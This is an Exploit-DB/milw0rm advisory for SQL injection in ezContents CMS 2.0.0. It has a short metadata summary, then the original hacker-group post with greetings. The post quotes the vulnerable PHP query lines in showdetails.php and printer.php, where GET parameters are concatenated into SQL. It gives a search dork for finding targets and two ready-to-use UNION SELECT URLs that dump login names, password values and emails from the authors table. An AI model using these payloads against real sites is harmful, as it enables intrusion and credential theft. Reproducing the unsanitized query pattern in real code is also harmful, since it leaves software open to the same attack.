ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities

vendor:

ezContents CMS

by:

Virangar Security Team

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ezContents CMS

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:ezcontents:ezcontents_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities

ezContents CMS Version 2.0.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords. The vulnerable code is present in the showdetails.php and printer.php files. An attacker can exploit this vulnerability by sending a specially crafted HTTP GET request to the vulnerable files. The payloads used in the exploit are: showdetails.php: $strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["contentname"]."' AND language='".$GLOBALS["gsLanguage"]."'"; printer.php: $strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["article"]."' AND language='".$GLOBALS["gsLanguage"]."'";

Mitigation:

Upgrade to the latest version of ezContents CMS.

Source

Exploit-DB raw data:

  #######################################################################################
  #                                                                                     #
  # ...:::::ezContents CMS Version 2.0.0  SQL Injection Vulnerabilities ::::...         #           
  #######################################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----
d0rk:"ezContents CMS Version 2.0.0"
-------vuln codes in:-----------
showdetails.php:
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["contentname"]."' AND language='".$GLOBALS["gsLanguage"]."'";
*********
printer.php:
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["article"]."' AND language='".$GLOBALS["gsLanguage"]."'";
---
exploits:
http://site.com/[patch]/showdetails.php?contentname='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
---
young iranian h4ck3rz
/* tnx 2:
st0rke,aria-security.net,r00tsecurity.org,all h4ck3rz */

# milw0rm.com [2008-05-07]